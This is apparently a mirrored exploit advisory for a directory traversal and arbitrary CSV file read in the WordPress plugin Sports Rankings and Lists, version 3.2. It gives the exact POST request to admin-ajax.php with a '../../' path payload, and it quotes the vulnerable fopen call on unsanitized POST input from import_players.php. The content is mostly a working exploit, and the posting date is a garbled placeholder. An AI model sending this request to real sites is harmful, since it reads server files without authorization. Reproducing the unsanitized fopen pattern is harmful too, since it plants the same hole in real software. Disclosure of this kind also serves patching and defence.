Wordpress plugin Sports Rankings and Lists directory
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wordpress plugin Sports Rankings and Lists directory</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress plugin Sports Rankings and Lists directory traversal and arbitrary csv file read # Date: 2017-03-17 # Exploit Author: malwrforensics # Vendor Homepage: https://fantasyknuckleheads.com/ # Software Link: https://downloads.wordpress.org/plugin/sports-rankings-lists.zip # Version: 3.2 # Tested on: Ubuntu 16.04 HTTP Req: POST http://<server>/wp-admin/admin-ajax.php HTTP/1.1 <snip> Referer: http://<server>/wp-admin/post-new.php?post_type=player_list action=import_players_from_csv&url=../../../../../../../usr/share/distro-info/debian.csv Details ------- File: import_players.php Reason: The first parameter of the fopen function isn't properly sanitized. <snip> else if (($handle = fopen($_POST['url'], "r")) !== FALSE) { <snip></BODY></HTML>